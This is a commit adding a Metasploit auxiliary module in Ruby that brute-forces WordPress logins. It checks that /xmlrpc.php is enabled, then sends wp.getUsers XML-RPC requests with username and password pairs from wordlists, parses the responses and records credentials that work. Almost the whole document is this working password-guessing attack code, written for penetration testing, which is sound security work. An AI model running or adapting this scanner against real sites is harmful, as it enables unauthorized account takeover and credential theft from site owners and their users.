Add Wordpress XML-RPC Login Scanner

Ceenix · Ceenix · commit cdabfb84f4b3 · 2014-07-25T16:24:09.000+03:00
This module attempts to authenticate against a Wordpress-site (via
  XMLRPC) using username and password combinations indicated by the
  USER_FILE, PASS_FILE, and USERPASS_FILE options.

  The module, checks for XMLRPC response using `demo.sayHello` function
  and sweeps users with `wp.getUsers` function.

  If `verbose` is set `true`, the raw XML response will be printed.

  The module might be usefull when the target's administration page
  is protected.
diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb
@@ -0,0 +1,158 @@
+##
+# wordpress_xmlrpc_login.rb
+##
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Auxiliary
+
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Auxiliary::Scanner
+    include Msf::Auxiliary::AuthBrute
+    include Msf::Auxiliary::Report
+
+    def initialize(info = {})
+      super(update_info(info,
+        'Name'         => 'Wordpress XML-RPC Username/Password Login Scanner',
+        'Description'  => %q{
+          This module attempts to authenticate against a Wordpress-site
+          (via XMLRPC) using username and password combinations indicated
+          by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
+         },
+        'Author'      =>
+          [
+            'Cenk Kalpakoglu <cenk.kalpakoglu[at]gmail.com>',
+          ],
+        'License'     => MSF_LICENSE,
+        'References'  =>
+          [
+            [ 'URL', 'https://wordpress.org/'],
+            [ 'URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],
+            [ 'CVE', '1999-0502'] # Weak password
+          ]
+        ))
+
+      register_options(
+          [
+            Opt::RPORT(80),
+            OptString.new('TARGETURI', [ true, 'The path to wordpress xmlrpc file, default is /xmlrpc.php', '/xmlrpc.php']),
+            OptBool.new('VERBOSE', [false, 'Whether to print output for all attempts', false]) # warning
+          ], self.class)
+
+      deregister_options('BLANK_PASSWORDS') # we don't need this option
+    end
+
+    def is_xmlrpc_enabled()
+      xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
+      xml << "<methodCall>"
+      xml << "<methodName>demo.sayHello</methodName>"
+      xml << "<params>"
+      xml << "<param></param>"
+      xml << "</params>"
+      xml << "</methodCall>"
+
+      res = send_request_cgi({
+        'uri'       => datastore['TARGETURI'],
+        'method'    => 'POST',
+        'data'      => "#{xml}"
+      })
+
+      if res
+        if res.body =~ /<string>Hello!<\/string>/
+          return true # xmlrpc is enabled
+        end
+      end
+      return
+    end
+
+    def generate_xml_request(user, pass)
+      xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
+      xml << "<methodCall>"
+      xml << "<methodName>wp.getUsers</methodName>"
+      xml << "<params><param><value>1</value></param>"
+      xml << "<param><value>#{user}</value></param>"
+      xml << "<param><value>#{pass}</value></param>"
+      xml << "</params>"
+      xml << "</methodCall>"
+      return xml
+    end
+
+    def run_host(ip)
+      print_status("Checking #{rhost}:#{datastore['TARGETURI']} for xmlrpc..")
+      if not is_xmlrpc_enabled
+        print_error("#{rhost} XMLRPC is not enabled! -- Aborting")
+        return :abort
+      else
+        print_good("XMLRPC enabled, Hello message received!")
+      end
+
+      print_status("#{rhost}:#{rport} - Starting XML-RPC login sweep")
+      each_user_pass { |user, pass|
+        if user != "" # empty line fix
+          do_login(user, pass)
+        end
+      }
+    end
+
+    def do_login(user, pass)
+      vprint_status("Trying username:'#{user}' with password:'#{pass}'")
+      xml_req = generate_xml_request(user, pass)
+      begin
+        res = send_request_cgi({
+            'uri'       => datastore['TARGETURI'],
+            'method'    => 'POST',
+            'data'      => "#{xml_req}"
+        }, 25)
+        http_fingerprint({ :response => res })
+      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+        print_error("HTTP Connection Failed, Aborting")
+        return :abort
+      end
+
+      if not res
+        print_error("Connection timed out, Aborting")
+        return :abort
+      end
+
+      if res.code != 200
+        vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
+        return :skip_pass
+      end
+
+      if res.code == 200
+        # TODO: add more error codes
+        if res.body =~ /<value><int>403<\/int><\/value>/
+          vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
+          return :skip_pass
+
+        elsif res.body =~ /<value><int>-32601<\/int><\/value>/
+          print_error("Server error: Requested method `wp.getUsers` does not exists. -- Aborting")
+          return :abort
+
+        elsif res.body =~ /<value><int>401<\/int><\/value>/ or res.body =~ /<name>user_id<\/name>/
+          print_good("SUCESSFUL LOGIN. '#{user}' : '#{pass}'")
+          # If verbose set True, dump xml response
+          vprint_good("#{res}")
+
+          report_hash = {
+            :host   => datastore['RHOST'],
+            :port   => datastore['RPORT'],
+            :sname  => 'wordpress-xmlrpc',
+            :user   => user,
+            :pass   => pass,
+            :active => true,
+            :type   => 'password'}
+
+          report_auth_info(report_hash)
+          return :next_user
+        end
+      end
+      # Unknow error
+      vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
+      return :skip_pass
+    end
+end
